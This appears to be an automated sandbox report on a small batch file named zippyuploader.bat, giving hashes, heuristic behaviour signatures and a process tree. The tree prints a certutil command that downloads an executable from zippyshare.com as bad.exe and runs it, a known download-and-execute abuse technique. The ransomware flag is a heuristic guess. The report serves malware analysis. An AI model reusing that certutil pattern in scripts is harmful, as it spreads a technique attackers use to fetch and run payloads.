Analysis
max time kernel: 322s
max time network: 1580s
platform: windows10_x64
resource: win10-20220223-en
submitted: 21-03-2022 16:55
Static task: static1
Behavioral task: behavioral1, Sample: zippyuploader.bat, Resource: win7-20220310-en
Behavioral task: behavioral2, Sample: zippyuploader.bat, Resource: win10-20220223-en
Behavioral task: behavioral3, Sample: zippyuploader.bat, Resource: win10v2004-20220310-en
General
Target: zippyuploader.bat
Size: 107B
MD5: 0fac231074f90878c2283b2561ed906c
SHA1: 2c3421f0a6c20b8c6fb07ffe62526438a5169194
SHA256: acfd8e0557e2efc01d981221e5e5e0fcd68f7231a72d3d46361294d9df43d984
SHA512: fdc5f227244f4e0a76356aba17e38823e0e9bb0ffc344ce07b6bc9282c7192c08a9cbd42d157d13be0c378c9678aec4ea1ea6c7d663d21e732a73a2ceb6159b9
Malware Config
Signatures
Downloads MZ/PE file
Executes dropped EXE 1 IoCs
Processes:
pid 3064, process bad.exe
Processes:
resource C:\Users\Admin\AppData\Local\Temp\bad.exe, yara_rule upx
resource C:\Users\Admin\AppData\Local\Temp\bad.exe, yara_rule upx
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class 33 IoCs
Processes:
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid 3064, process bad.exe
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
pid 3064, process bad.exe
pid 3064, process bad.exe
pid 3064, process bad.exe
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid 3064, process bad.exe
pid 3064, process bad.exe
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
pid 3064, process bad.exe
pid 3064, process bad.exe
pid 3064, process bad.exe
pid 3064, process bad.exe
pid 3064, process bad.exe
pid 3064, process bad.exe
pid 3064, process bad.exe
pid 3064, process bad.exe
Suspicious use of WriteProcessMemory 5 IoCs
Processes (description, pid, process, target process):
PID 3584 wrote to memory of 3896: 3584 cmd.exe, target certutil.exe
PID 3584 wrote to memory of 3896: 3584 cmd.exe, target certutil.exe
PID 3584 wrote to memory of 3064: 3584 cmd.exe, target bad.exe
PID 3584 wrote to memory of 3064: 3584 cmd.exe, target bad.exe
PID 3584 wrote to memory of 3064: 3584 cmd.exe, target bad.exe
Processes
C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zippyuploader.bat"
  - Suspicious use of WriteProcessMemory
  PID: 3584
    C:\Windows\system32\certutil.exe
      Command line: certutil.exe -urlcache -f https://www.zippyshare.com/zippyuploader/ZippyUploader.exe bad.exe
      PID: 3896
    C:\Users\Admin\AppData\Local\Temp\bad.exe
      Command line: bad.exe
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
      PID: 3064
C:\Windows\SysWOW64\DllHost.exe
  Command line: C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  PID: 3680
Network
MITRE ATT&CK Enterprise v6
Downloads
MD5: ed323324bff4fbe54be6040ef429862c
SHA1: 2182d6953bc33050d44ca585ca3e6e64cd0a6864
SHA256: 88184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442
SHA512: 72511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b